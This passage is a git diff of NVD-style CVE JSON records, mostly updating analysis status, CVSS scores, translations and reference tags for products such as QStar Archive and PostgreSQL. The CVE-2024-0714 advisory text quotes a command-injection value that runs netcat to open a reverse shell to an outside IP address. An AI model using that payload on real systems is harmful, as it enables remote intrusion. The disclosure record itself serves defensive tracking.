a/CVE-2023/CVE-2023-510xx/CVE-2023-51065.json +++ b/CVE-2023/CVE-2023-510xx/CVE-2023-51065.json @@ -2,19 +2,79 @@ "id": "CVE-2023-51065", "sourceIdentifier": "cve@mitre.org", "published": "2024-01-13T04:15:07.913", - "lastModified": "2024-01-14T21:42:17.123", - "vulnStatus": "Awaiting Analysis", + "lastModified": "2024-01-19T15:39:34.107", + "vulnStatus": "Analyzed", "descriptions": [ { "lang": "en", "value": "Incorrect access control in QStar Archive Solutions Release RELEASE_3-0 Build 7 Patch 0 allows unauthenticated attackers to obtain system backups and other sensitive information from the QStar Server." + }, + { + "lang": "es", + "value": "El control de acceso incorrecto en QStar Archive Solutions Release RELEASE_3-0 Build 7 Patch 0 permite a atacantes no autenticados obtener copias de seguridad del sistema y otra informaci\u00f3n confidencial del QStar Server." + } + ], + "metrics": { + "cvssMetricV31": [ + { + "source": "nvd@nist.gov", + "type": "Primary", + "cvssData": { + "version": "3.1", + "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "attackVector": "NETWORK", + "attackComplexity": "LOW", + "privilegesRequired": "NONE", + "userInteraction": "NONE", + "scope": "UNCHANGED", + "confidentialityImpact": "HIGH", + "integrityImpact": "NONE", + "availabilityImpact": "NONE", + "baseScore": 7.5, + "baseSeverity": "HIGH" + }, + "exploitabilityScore": 3.9, + "impactScore": 3.6 + } + ] + }, + "weaknesses": [ + { + "source": "nvd@nist.gov", + "type": "Primary", + "description": [ + { + "lang": "en", + "value": "NVD-CWE-Other" + } + ] + } + ], + "configurations": [ + { + "nodes": [ + { + "operator": "OR", + "negate": false, + "cpeMatch": [ + { + "vulnerable": true, + "criteria": "cpe:2.3:a:qstar:archive_storage_manager:3-0:build7_patch0:*:*:*:*:*:*", + "matchCriteriaId": "7AC007B1-2FE5-4DD3-824D-FFFA7009D67B" + } + ] + } + ] } ], - "metrics": {}, "references": [ { "url": "https://github.com/Oracle-Security/CVEs/blob/main/QStar%20Archive%20Solutions/CVE-2023-51065.md", - "source": "cve@mitre.org" + "source": "cve@mitre.org", + "tags": [ + "Exploit", + "Third Party Advisory" + ] } ] } \ No newline at end of file diff --git a/CVE-2023/CVE-2023-510xx/CVE-2023-51066.json b/CVE-2023/CVE-2023-510xx/CVE-2023-51066.json index ce6b1bf31d9..0a0c1ee4b67 100644 --- a/CVE-2023/CVE-2023-510xx/CVE-2023-51066.json +++ b/CVE-2023/CVE-2023-510xx/CVE-2023-51066.json @@ -2,19 +2,79 @@ "id": "CVE-2023-51066", "sourceIdentifier": "cve@mitre.org", "published": "2024-01-13T04:15:07.957", - "lastModified": "2024-01-14T21:42:17.123", - "vulnStatus": "Awaiting Analysis", + "lastModified": "2024-01-19T15:29:32.340", + "vulnStatus": "Analyzed", "descriptions": [ { "lang": "en", "value": "An authenticated remote code execution vulnerability in QStar Archive Solutions Release RELEASE_3-0 Build 7 Patch 0 allows attackers to arbitrarily execute commands." + }, + { + "lang": "es", + "value": "Una vulnerabilidad de ejecuci\u00f3n remota de c\u00f3digo autenticado en QStar Archive Solutions Release RELEASE_3-0 Build 7 Patch 0 permite a los atacantes ejecutar comandos de forma arbitraria." + } + ], + "metrics": { + "cvssMetricV31": [ + { + "source": "nvd@nist.gov", + "type": "Primary", + "cvssData": { + "version": "3.1", + "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", + "attackVector": "NETWORK", + "attackComplexity": "LOW", + "privilegesRequired": "LOW", + "userInteraction": "NONE", + "scope": "UNCHANGED", + "confidentialityImpact": "HIGH", + "integrityImpact": "HIGH", + "availabilityImpact": "HIGH", + "baseScore": 8.8, + "baseSeverity": "HIGH" + }, + "exploitabilityScore": 2.8, + "impactScore": 5.9 + } + ] + }, + "weaknesses": [ + { + "source": "nvd@nist.gov", + "type": "Primary", + "description": [ + { + "lang": "en", + "value": "CWE-94" + } + ] + } + ], + "configurations": [ + { + "nodes": [ + { + "operator": "OR", + "negate": false, + "cpeMatch": [ + { + "vulnerable": true, + "criteria": "cpe:2.3:a:qstar:archive_storage_manager:3-0:build7_patch0:*:*:*:*:*:*", + "matchCriteriaId": "7AC007B1-2FE5-4DD3-824D-FFFA7009D67B" + } + ] + } + ] } ], - "metrics": {}, "references": [ { "url": "https://github.com/Oracle-Security/CVEs/blob/main/QStar%20Archive%20Solutions/CVE-2023-51066.md", - "source": "cve@mitre.org" + "source": "cve@mitre.org", + "tags": [ + "Exploit", + "Third Party Advisory" + ] } ] } \ No newline at end of file diff --git a/CVE-2023/CVE-2023-510xx/CVE-2023-51070.json b/CVE-2023/CVE-2023-510xx/CVE-2023-51070.json index c718132bf35..43e85c8cba5 100644 --- a/CVE-2023/CVE-2023-510xx/CVE-2023-51070.json +++ b/CVE-2023/CVE-2023-510xx/CVE-2023-51070.json @@ -2,19 +2,79 @@ "id": "CVE-2023-51070", "sourceIdentifier": "cve@mitre.org", "published": "2024-01-13T04:15:08.100", - "lastModified": "2024-01-14T21:42:17.123", - "vulnStatus": "Awaiting Analysis", + "lastModified": "2024-01-19T15:29:36.020", + "vulnStatus": "Analyzed", "descriptions": [ { "lang": "en", "value": "An access control issue in QStar Archive Solutions Release RELEASE_3-0 Build 7 Patch 0 allows unauthenticated attackers to arbitrarily adjust sensitive SMB settings on the QStar Server." + }, + { + "lang": "es", + "value": "Un problema de control de acceso en QStar Archive Solutions Release RELEASE_3-0 Build 7 Patch 0 permite a atacantes no autenticados ajustar arbitrariamente configuraciones SMB confidenciales en el servidor QStar." + } + ], + "metrics": { + "cvssMetricV31": [ + { + "source": "nvd@nist.gov", + "type": "Primary", + "cvssData": { + "version": "3.1", + "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "attackVector": "NETWORK", + "attackComplexity": "LOW", + "privilegesRequired": "NONE", + "userInteraction": "NONE", + "scope": "UNCHANGED", + "confidentialityImpact": "NONE", + "integrityImpact": "HIGH", + "availabilityImpact": "NONE", + "baseScore": 7.5, + "baseSeverity": "HIGH" + }, + "exploitabilityScore": 3.9, + "impactScore": 3.6 + } + ] + }, + "weaknesses": [ + { + "source": "nvd@nist.gov", + "type": "Primary", + "description": [ + { + "lang": "en", + "value": "NVD-CWE-Other" + } + ] + } + ], + "configurations": [ + { + "nodes": [ + { + "operator": "OR", + "negate": false, + "cpeMatch": [ + { + "vulnerable": true, + "criteria": "cpe:2.3:a:qstar:archive_storage_manager:3-0:build7_patch0:*:*:*:*:*:*", + "matchCriteriaId": "7AC007B1-2FE5-4DD3-824D-FFFA7009D67B" + } + ] + } + ] } ], - "metrics": {}, "references": [ { "url": "https://github.com/Oracle-Security/CVEs/blob/main/QStar%20Archive%20Solutions/CVE-2023-51070.md", - "source": "cve@mitre.org" + "source": "cve@mitre.org", + "tags": [ + "Exploit", + "Third Party Advisory" + ] } ] } \ No newline at end of file diff --git a/CVE-2023/CVE-2023-510xx/CVE-2023-51071.json b/CVE-2023/CVE-2023-510xx/CVE-2023-51071.json index 3225a540057..746131168e0 100644 --- a/CVE-2023/CVE-2023-510xx/CVE-2023-51071.json +++ b/CVE-2023/CVE-2023-510xx/CVE-2023-51071.json @@ -2,19 +2,79 @@ "id": "CVE-2023-51071", "sourceIdentifier": "cve@mitre.org", "published": "2024-01-13T04:15:08.143", - "lastModified": "2024-01-14T21:42:17.123", - "vulnStatus": "Awaiting Analysis", + "lastModified": "2024-01-19T15:20:47.503", + "vulnStatus": "Analyzed", "descriptions": [ { "lang": "en", "value": "An access control issue in QStar Archive Solutions Release RELEASE_3-0 Build 7 Patch 0 allows unauthenticated attackers to arbitrarily disable the SMB service on a victim's Qstar instance by executing a specific command in a link." + }, + { + "lang": "es", + "value": "Un problema de control de acceso en QStar Archive Solutions Release RELEASE_3-0 Build 7 Patch 0 permite a atacantes no autenticados desactivar arbitrariamente el servicio SMB en la instancia Qstar de una v\u00edctima ejecutando un comando espec\u00edfico en un enlace." + } + ], + "metrics": { + "cvssMetricV31": [ + { + "source": "nvd@nist.gov", + "type": "Primary", + "cvssData": { + "version": "3.1", + "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L", + "attackVector": "NETWORK", + "attackComplexity": "LOW", + "privilegesRequired": "NONE", + "userInteraction": "NONE", + "scope": "UNCHANGED", + "confidentialityImpact": "NONE", + "integrityImpact": "LOW", + "availabilityImpact": "LOW", + "baseScore": 6.5, + "baseSeverity": "MEDIUM" + }, + "exploitabilityScore": 3.9, + "impactScore": 2.5 + } + ] + }, + "weaknesses": [ + { + "source": "nvd@nist.gov", + "type": "Primary", + "description": [ + { + "lang": "en", + "value": "NVD-CWE-Other" + } + ] + } + ], + "configurations": [ + { + "nodes": [ + { + "operator": "OR", + "negate": false, + "cpeMatch": [ + { + "vulnerable": true, + "criteria": "cpe:2.3:a:qstar:archive_storage_manager:3-0:build7_patch0:*:*:*:*:*:*", + "matchCriteriaId": "7AC007B1-2FE5-4DD3-824D-FFFA7009D67B" + } + ] + } + ] } ], - "metrics": {}, "references": [ { "url": "https://github.com/Oracle-Security/CVEs/blob/main/QStar%20Archive%20Solutions/CVE-2023-51071.md", - "source": "cve@mitre.org" + "source": "cve@mitre.org", + "tags": [ + "Exploit", + "Third Party Advisory" + ] } ] } \ No newline at end of file diff --git a/CVE-2023/CVE-2023-519xx/CVE-2023-51946.json b/CVE-2023/CVE-2023-519xx/CVE-2023-51946.json index 62dd79c0433..94ee44182fb 100644 --- a/CVE-2023/CVE-2023-519xx/CVE-2023-51946.json +++ b/CVE-2023/CVE-2023-519xx/CVE-2023-51946.json @@ -2,8 +2,8 @@ "id": "CVE-2023-51946", "sourceIdentifier": "cve@mitre.org", "published": "2024-01-19T14:15:12.500", - "lastModified": "2024-01-19T14:15:12.500", - "vulnStatus": "Received", + "lastModified": "2024-01-19T15:56:19.500", + "vulnStatus": "Awaiting Analysis", "descriptions": [ { "lang": "en", diff --git a/CVE-2023/CVE-2023-519xx/CVE-2023-51947.json b/CVE-2023/CVE-2023-519xx/CVE-2023-51947.json index 9913239b238..40611bf3d0c 100644 --- a/CVE-2023/CVE-2023-519xx/CVE-2023-51947.json +++ b/CVE-2023/CVE-2023-519xx/CVE-2023-51947.json @@ -2,8 +2,8 @@ "id": "CVE-2023-51947", "sourceIdentifier": "cve@mitre.org", "published": "2024-01-19T14:15:12.553", - "lastModified": "2024-01-19T14:15:12.553", - "vulnStatus": "Received", + "lastModified": "2024-01-19T15:56:19.500", + "vulnStatus": "Awaiting Analysis", "descriptions": [ { "lang": "en", diff --git a/CVE-2023/CVE-2023-519xx/CVE-2023-51948.json b/CVE-2023/CVE-2023-519xx/CVE-2023-51948.json index 3e8273d6c0a..3e24cc5fdfa 100644 --- a/CVE-2023/CVE-2023-519xx/CVE-2023-51948.json +++ b/CVE-2023/CVE-2023-519xx/CVE-2023-51948.json @@ -2,8 +2,8 @@ "id": "CVE-2023-51948", "sourceIdentifier": "cve@mitre.org", "published": "2024-01-19T14:15:12.663", - "lastModified": "2024-01-19T14:15:12.663", - "vulnStatus": "Received", + "lastModified": "2024-01-19T15:56:19.500", + "vulnStatus": "Awaiting Analysis", "descriptions": [ { "lang": "en", diff --git a/CVE-2023/CVE-2023-521xx/CVE-2023-52109.json b/CVE-2023/CVE-2023-521xx/CVE-2023-52109.json index 0f4a606fed3..f435a5ab954 100644 --- a/CVE-2023/CVE-2023-521xx/CVE-2023-52109.json +++ b/CVE-2023/CVE-2023-521xx/CVE-2023-52109.json @@ -2,8 +2,8 @@ "id": "CVE-2023-52109", "sourceIdentifier": "psirt@huawei.com", "published": "2024-01-16T08:15:08.763", - "lastModified": "2024-01-16T13:56:05.467", - "vulnStatus": "Awaiting Analysis", + "lastModified": "2024-01-19T16:12:37.337", + "vulnStatus": "Analyzed", "descriptions": [ { "lang": "en", @@ -14,8 +14,41 @@ "value": "Vulnerabilidad de relaciones de confianza siendo inexactas en escenarios distribuidos. La explotaci\u00f3n exitosa de esta vulnerabilidad puede afectar la confidencialidad del servicio." } ], - "metrics": {}, + "metrics": { + "cvssMetricV31": [ + { + "source": "nvd@nist.gov", + "type": "Primary", + "cvssData": { + "version": "3.1", + "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "attackVector": "NETWORK", + "attackComplexity": "LOW", + "privilegesRequired": "NONE", + "userInteraction": "NONE", + "scope": "UNCHANGED", + "confidentialityImpact": "HIGH", + "integrityImpact": "NONE", + "availabilityImpact": "NONE", + "baseScore": 7.5, + "baseSeverity": "HIGH" + }, + "exploitabilityScore": 3.9, + "impactScore": 3.6 + } + ] + }, "weaknesses": [ + { + "source": "nvd@nist.gov", + "type": "Primary", + "description": [ + { + "lang": "en", + "value": "NVD-CWE-noinfo" + } + ] + }, { "source": "psirt@huawei.com", "type": "Secondary", @@ -27,14 +60,52 @@ ] } ], + "configurations": [ + { + "nodes": [ + { + "operator": "OR", + "negate": false, + "cpeMatch": [ + { + "vulnerable": true, + "criteria": "cpe:2.3:o:huawei:emui:13.0.0:*:*:*:*:*:*:*", + "matchCriteriaId": "353AEAF2-AF46-4835-93E1-4F942D5E2810" + }, + { + "vulnerable": true, + "criteria": "cpe:2.3:o:huawei:harmonyos:3.0.0:*:*:*:*:*:*:*", + "matchCriteriaId": "CB3751C1-7729-41D3-AE50-80B5AF601135" + }, + { + "vulnerable": true, + "criteria": "cpe:2.3:o:huawei:harmonyos:3.1.0:*:*:*:*:*:*:*", + "matchCriteriaId": "4D81C4EF-7CAF-4E60-91A4-8CF7B95B2B54" + }, + { + "vulnerable": true, + "criteria": "cpe:2.3:o:huawei:harmonyos:4.0.0:*:*:*:*:*:*:*", + "matchCriteriaId": "8198CDB2-4BC5-411A-8736-615A531FC545" + } + ] + } + ] + } + ], "references": [ { "url": "https://consumer.huawei.com/en/support/bulletin/2024/1/", - "source": "psirt@huawei.com" + "source": "psirt@huawei.com", + "tags": [ + "Vendor Advisory" + ] }, { "url": "https://device.harmonyos.com/en/docs/security/update/security-bulletins-202401-0000001799925977", - "source": "psirt@huawei.com" + "source": "psirt@huawei.com", + "tags": [ + "Vendor Advisory" + ] } ] } \ No newline at end of file diff --git a/CVE-2023/CVE-2023-55xx/CVE-2023-5528.json b/CVE-2023/CVE-2023-55xx/CVE-2023-5528.json index adea53a0207..0f678f88f70 100644 --- a/CVE-2023/CVE-2023-55xx/CVE-2023-5528.json +++ b/CVE-2023/CVE-2023-55xx/CVE-2023-5528.json @@ -2,8 +2,8 @@ "id": "CVE-2023-5528", "sourceIdentifier": "jordan@liggitt.net", "published": "2023-11-14T21:15:14.123", - "lastModified": "2023-11-30T15:10:23.117", - "vulnStatus": "Analyzed", + "lastModified": "2024-01-19T16:15:10.280", + "vulnStatus": "Modified", "descriptions": [ { "lang": "en", @@ -181,6 +181,10 @@ "tags": [ "Mailing List" ] + }, + { + "url": "https://security.netapp.com/advisory/ntap-20240119-0009/", + "source": "jordan@liggitt.net" } ] } \ No newline at end of file diff --git a/CVE-2023/CVE-2023-57xx/CVE-2023-5716.json b/CVE-2023/CVE-2023-57xx/CVE-2023-5716.json index 3b9edf6e281..e7c77fdb737 100644 --- a/CVE-2023/CVE-2023-57xx/CVE-2023-5716.json +++ b/CVE-2023/CVE-2023-57xx/CVE-2023-5716.json @@ -2,12 +2,16 @@ "id": "CVE-2023-5716", "sourceIdentifier": "twcert@cert.org.tw", "published": "2024-01-19T04:15:09.360", - "lastModified": "2024-01-19T04:15:09.360", - "vulnStatus": "Received", + "lastModified": "2024-01-19T15:56:26.533", + "vulnStatus": "Awaiting Analysis", "descriptions": [ { "lang": "en", "value": "ASUS Armoury Crate has a vulnerability in arbitrary file write and allows remote attackers to access or modify arbitrary files by sending specific HTTP requests without permission." + }, + { + "lang": "es", + "value": "ASUS Armory Crate tiene una vulnerabilidad en la escritura de archivos arbitrarios y permite a atacantes remotos acceder o modificar archivos arbitrarios enviando solicitudes HTTP espec\u00edficas sin permiso." } ], "metrics": { diff --git a/CVE-2023/CVE-2023-58xx/CVE-2023-5868.json b/CVE-2023/CVE-2023-58xx/CVE-2023-5868.json index f611b465dd5..7041284d647 100644 --- a/CVE-2023/CVE-2023-58xx/CVE-2023-5868.json +++ b/CVE-2023/CVE-2023-58xx/CVE-2023-5868.json @@ -2,7 +2,7 @@ "id": "CVE-2023-5868", "sourceIdentifier": "secalert@redhat.com", "published": "2023-12-10T18:15:07.163", - "lastModified": "2024-01-19T03:15:08.130", + "lastModified": "2024-01-19T16:15:10.410", "vulnStatus": "Modified", "descriptions": [ { @@ -452,6 +452,10 @@ "Issue Tracking" ] }, + { + "url": "https://security.netapp.com/advisory/ntap-20240119-0003/", + "source": "secalert@redhat.com" + }, { "url": "https://www.postgresql.org/about/news/postgresql-161-155-1410-1313-1217-and-1122-released-2749/", "source": "secalert@redhat.com", diff --git a/CVE-2023/CVE-2023-58xx/CVE-2023-5869.json b/CVE-2023/CVE-2023-58xx/CVE-2023-5869.json index 058bacb00d9..4af78ac3a36 100644 --- a/CVE-2023/CVE-2023-58xx/CVE-2023-5869.json +++ b/CVE-2023/CVE-2023-58xx/CVE-2023-5869.json @@ -2,7 +2,7 @@ "id": "CVE-2023-5869", "sourceIdentifier": "secalert@redhat.com", "published": "2023-12-10T18:15:07.410", - "lastModified": "2024-01-19T03:15:08.343", + "lastModified": "2024-01-19T16:15:10.620", "vulnStatus": "Modified", "descriptions": [ { @@ -528,6 +528,10 @@ "Issue Tracking" ] }, + { + "url": "https://security.netapp.com/advisory/ntap-20240119-0003/", + "source": "secalert@redhat.com" + }, { "url": "https://www.postgresql.org/about/news/postgresql-161-155-1410-1313-1217-and-1122-released-2749/", "source": "secalert@redhat.com", diff --git a/CVE-2023/CVE-2023-58xx/CVE-2023-5870.json b/CVE-2023/CVE-2023-58xx/CVE-2023-5870.json index 6c7aed9b6b9..d4cbc60bdfb 100644 --- a/CVE-2023/CVE-2023-58xx/CVE-2023-5870.json +++ b/CVE-2023/CVE-2023-58xx/CVE-2023-5870.json @@ -2,7 +2,7 @@ "id": "CVE-2023-5870", "sourceIdentifier": "secalert@redhat.com", "published": "2023-12-10T18:15:07.643", - "lastModified": "2024-01-19T03:15:08.583", + "lastModified": "2024-01-19T16:15:10.867", "vulnStatus": "Modified", "descriptions": [ { @@ -452,6 +452,10 @@ "Issue Tracking" ] }, + { + "url": "https://security.netapp.com/advisory/ntap-20240119-0003/", + "source": "secalert@redhat.com" + }, { "url": "https://www.postgresql.org/about/news/postgresql-161-155-1410-1313-1217-and-1122-released-2749/", "source": "secalert@redhat.com", diff --git a/CVE-2023/CVE-2023-62xx/CVE-2023-6277.json b/CVE-2023/CVE-2023-62xx/CVE-2023-6277.json index 5ca37e712d1..9289fa326bd 100644 --- a/CVE-2023/CVE-2023-62xx/CVE-2023-6277.json +++ b/CVE-2023/CVE-2023-62xx/CVE-2023-6277.json @@ -2,7 +2,7 @@ "id": "CVE-2023-6277", "sourceIdentifier": "secalert@redhat.com", "published": "2023-11-24T19:15:07.643", - "lastModified": "2024-01-14T02:15:46.917", + "lastModified": "2024-01-19T16:15:11.057", "vulnStatus": "Modified", "descriptions": [ { @@ -181,6 +181,10 @@ { "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Y7ZGN2MZXJ6E57W3L4YBM3ZPAU3T7T5C/", "source": "secalert@redhat.com" + }, + { + "url": "https://security.netapp.com/advisory/ntap-20240119-0002/", + "source": "secalert@redhat.com" } ] } \ No newline at end of file diff --git a/CVE-2024/CVE-2024-03xx/CVE-2024-0318.json b/CVE-2024/CVE-2024-03xx/CVE-2024-0318.json index 747312bf0f5..d6978a63e30 100644 --- a/CVE-2024/CVE-2024-03xx/CVE-2024-0318.json +++ b/CVE-2024/CVE-2024-03xx/CVE-2024-0318.json @@ -2,8 +2,8 @@ "id": "CVE-2024-0318", "sourceIdentifier": "cve-coordination@incibe.es", "published": "2024-01-15T17:15:09.060", - "lastModified": "2024-01-16T13:56:05.467", - "vulnStatus": "Awaiting Analysis", + "lastModified": "2024-01-19T16:13:08.503", + "vulnStatus": "Analyzed", "descriptions": [ { "lang": "en", @@ -16,6 +16,26 @@ ], "metrics": { "cvssMetricV31": [ + { + "source": "nvd@nist.gov", + "type": "Primary", + "cvssData": { + "version": "3.1", + "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", + "attackVector": "NETWORK", + "attackComplexity": "LOW", + "privilegesRequired": "NONE", + "userInteraction": "REQUIRED", + "scope": "CHANGED", + "confidentialityImpact": "LOW", + "integrityImpact": "LOW", + "availabilityImpact": "NONE", + "baseScore": 6.1, + "baseSeverity": "MEDIUM" + }, + "exploitabilityScore": 2.8, + "impactScore": 2.7 + }, { "source": "cve-coordination@incibe.es", "type": "Secondary", @@ -50,10 +70,30 @@ ] } ], + "configurations": [ + { + "nodes": [ + { + "operator": "OR", + "negate": false, + "cpeMatch": [ + { + "vulnerable": true, + "criteria": "cpe:2.3:a:fireeye:hxtool:4.6:*:*:*:*:*:*:*", + "matchCriteriaId": "8890FF42-C498-4DC3-95C7-2432822CDB35" + } + ] + } + ] + } + ], "references": [ { "url": "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-fireeye-products", - "source": "cve-coordination@incibe.es" + "source": "cve-coordination@incibe.es", + "tags": [ + "Third Party Advisory" + ] } ] } \ No newline at end of file diff --git a/CVE-2024/CVE-2024-07xx/CVE-2024-0705.json b/CVE-2024/CVE-2024-07xx/CVE-2024-0705.json index 542bc146b0a..ad58ffbd9ef 100644 --- a/CVE-2024/CVE-2024-07xx/CVE-2024-0705.json +++ b/CVE-2024/CVE-2024-07xx/CVE-2024-0705.json @@ -2,12 +2,16 @@ "id": "CVE-2024-0705", "sourceIdentifier": "security@wordfence.com", "published": "2024-01-19T10:15:34.287", - "lastModified": "2024-01-19T10:15:34.287", - "vulnStatus": "Received", + "lastModified": "2024-01-19T15:56:26.533", + "vulnStatus": "Awaiting Analysis", "descriptions": [ { "lang": "en", "value": "The Stripe Payment Plugin for WooCommerce plugin for WordPress is vulnerable to SQL Injection via the 'id' parameter in all versions up to, and including, 3.7.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database." + }, + { + "lang": "es", + "value": "El complemento Stripe Payment Plugin for WooCommerce para WordPress es vulnerable a la inyecci\u00f3n SQL a trav\u00e9s del par\u00e1metro 'id' en todas las versiones hasta la 3.7.9 incluida debido a un escape insuficiente en el par\u00e1metro proporcionado por el usuario y a la falta de preparaci\u00f3n suficiente en la consulta SQL existente. Esto hace posible que atacantes no autenticados agreguen consultas SQL adicionales a consultas ya existentes que pueden usarse para extraer informaci\u00f3n confidencial de la base de datos." } ], "metrics": { diff --git a/CVE-2024/CVE-2024-07xx/CVE-2024-0712.json b/CVE-2024/CVE-2024-07xx/CVE-2024-0712.json index 302a20bebbe..6685bfc63a6 100644 --- a/CVE-2024/CVE-2024-07xx/CVE-2024-0712.json +++ b/CVE-2024/CVE-2024-07xx/CVE-2024-0712.json @@ -2,8 +2,8 @@ "id": "CVE-2024-0712", "sourceIdentifier": "cna@vuldb.com", "published": "2024-01-19T14:15:12.837", - "lastModified": "2024-01-19T14:15:12.837", - "vulnStatus": "Received", + "lastModified": "2024-01-19T15:56:19.500", + "vulnStatus": "Awaiting Analysis", "descriptions": [ { "lang": "en", diff --git a/CVE-2024/CVE-2024-07xx/CVE-2024-0713.json b/CVE-2024/CVE-2024-07xx/CVE-2024-0713.json index 4f684c1f3a2..d84e1952284 100644 --- a/CVE-2024/CVE-2024-07xx/CVE-2024-0713.json +++ b/CVE-2024/CVE-2024-07xx/CVE-2024-0713.json @@ -2,8 +2,8 @@ "id": "CVE-2024-0713", "sourceIdentifier": "cna@vuldb.com", "published": "2024-01-19T14:15:13.277", - "lastModified": "2024-01-19T14:15:13.277", - "vulnStatus": "Received", + "lastModified": "2024-01-19T15:56:19.500", + "vulnStatus": "Awaiting Analysis", "descriptions": [ { "lang": "en", diff --git a/CVE-2024/CVE-2024-07xx/CVE-2024-0714.json b/CVE-2024/CVE-2024-07xx/CVE-2024-0714.json new file mode 100644 index 00000000000..7828513d51e --- /dev/null +++ b/CVE-2024/CVE-2024-07xx/CVE-2024-0714.json @@ -0,0 +1,84 @@ +{ + "id": "CVE-2024-0714", + "sourceIdentifier": "cna@vuldb.com", + "published": "2024-01-19T15:15:08.997", + "lastModified": "2024-01-19T15:56:19.500", + "vulnStatus": "Awaiting Analysis", + "descriptions": [ + { + "lang": "en", + "value": "A vulnerability was found in MiczFlor RPi-Jukebox-RFID up to 2.5.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file userScripts.php of the component HTTP Request Handler. The manipulation of the argument folder with the input ;nc 104.236.1.147 4444 -e /bin/bash; leads to os command injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251540. NOTE: The vendor was contacted early about this disclosure but did not respond in any way." + } + ], + "metrics": { + "cvssMetricV31": [ + { + "source": "cna@vuldb.com", + "type": "Secondary", + "cvssData": { + "version": "3.1", + "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", + "attackVector": "NETWORK", + "attackComplexity": "LOW", + "privilegesRequired": "LOW", + "userInteraction": "NONE", + "scope": "UNCHANGED", + "confidentialityImpact": "LOW", + "integrityImpact": "LOW", + "availabilityImpact": "LOW", + "baseScore": 6.3, + "baseSeverity": "MEDIUM" + }, + "exploitabilityScore": 2.8, + "impactScore": 3.4 + } + ], + "cvssMetricV2": [ + { + "source": "cna@vuldb.com", + "type": "Secondary", + "cvssData": { + "version": "2.0", + "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", + "accessVector": "NETWORK", + "accessComplexity": "LOW", + "authentication": "SINGLE", + "confidentialityImpact": "PARTIAL", + "integrityImpact": "PARTIAL", + "availabilityImpact": "PARTIAL", + "baseScore": 6.5 + }, + "baseSeverity": "MEDIUM", + "exploitabilityScore": 8.0, + "impactScore": 6.4, + "acInsufInfo": false, + "obtainAllPrivilege": false, + "obtainUserPrivilege": false, + "obtainOtherPrivilege": false, + "userInteractionRequired": false + } + ] + }, + "weaknesses": [ + { + "source": "cna@vuldb.com", + "type": "Secondary", + "description": [ + { + "lang": "en", + "value": "CWE-78" + } + ] + } + ], + "references": [ + { + "url": "https://vuldb.com/?ctiid.251540", + "source": "cna@vuldb.com" + }, + { + "url": "https://vuldb.com/?id.251540", + "source": "cna@vuldb.com" + } + ] +} \ No newline at end of file diff --git a/CVE-2024/CVE-2024-07xx/CVE-2024-0716.json b/CVE-2024/CVE-2024-07xx/CVE-2024-0716.json new file mode 100644 index 00000000000..4c46aa6404a --- /dev/null +++ b/CVE-2024/CVE-2024-07xx/CVE-2024-0716.json @@ -0,0 +1,88 @@ +{ + "id": "CVE-2024-0716", + "sourceIdentifier": "cna@vuldb.com", + "published": "2024-01-19T15:15:09.240", + "lastModified": "2024-01-19T15:56:19.500", + "vulnStatus": "Awaiting Analysis", + "descriptions": [ + { + "lang": "en", + "value": "A vulnerability classified as problematic has been found in Beijing Baichuo Smart S150 Management Platform V31R02B15. This affects an unknown part of the file /log/download.php of the component Backup File Handler. The manipulation leads to information disclosure. It is possible to initiate the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. The exploit has been disclosed to the public and may be used. The identifier VDB-251541 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way." + } + ], + "metrics": { + "cvssMetricV31": [ + { + "source": "cna@vuldb.com", + "type": "Secondary", + "cvssData": { + "version": "3.1", + "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N", + "attackVector": "NETWORK", + "attackComplexity": "HIGH", + "privilegesRequired": "LOW", + "userInteraction": "NONE", + "scope": "UNCHANGED", + "confidentialityImpact": "LOW", + "integrityImpact": "NONE", + "availabilityImpact": "NONE", + "baseScore": 3.1, + "baseSeverity": "LOW" + }, + "exploitabilityScore": 1.6, + "impactScore": 1.4 + } + ], + "cvssMetricV2": [ + { + "source": "cna@vuldb.com", + "type": "Secondary", + "cvssData": { + "version": "2.0", + "vectorString": "AV:N/AC:H/Au:S/C:P/I:N/A:N", + "accessVector": "NETWORK", + "accessComplexity": "HIGH", + "authentication": "SINGLE", + "confidentialityImpact": "PARTIAL", + "integrityImpact": "NONE", + "availabilityImpact": "NONE", + "baseScore": 2.1 + }, + "baseSeverity": "LOW", + "exploitabilityScore": 3.9, + "impactScore": 2.9, + "acInsufInfo": false, + "obtainAllPrivilege": false, + "obtainUserPrivilege": false, + "obtainOtherPrivilege": false, + "userInteractionRequired": false + } + ] + }, + "weaknesses": [ + { + "source": "cna@vuldb.com", + "type": "Primary", + "description": [ + { + "lang": "en", + "value": "CWE-200" + } + ] + } + ], + "references": [ + { + "url": "https://github.com/GTA12138/vul/blob/main/smart%20s150/s150%20Download%20any%20file/smart%20s150%20download%20any%20file.md", + "source": "cna@vuldb.com" + }, + { + "url": "https://vuldb.com/?ctiid.251541", + "source": "cna@vuldb.com" + }, + { + "url": "https://vuldb.com/?id.251541", + "source": "cna@vuldb.com" + } + ] +} \ No newline at end of file diff --git a/CVE-2024/CVE-2024-07xx/CVE-2024-0717.json b/CVE-2024/CVE-2024-07xx/CVE-2024-0717.json new file mode 100644 index 00000000000..300290aec98 --- /dev/null +++ b/CVE-2024/CVE-2024-07xx/CVE-2024-0717.json @@ -0,0 +1,88 @@ +{ + "id": 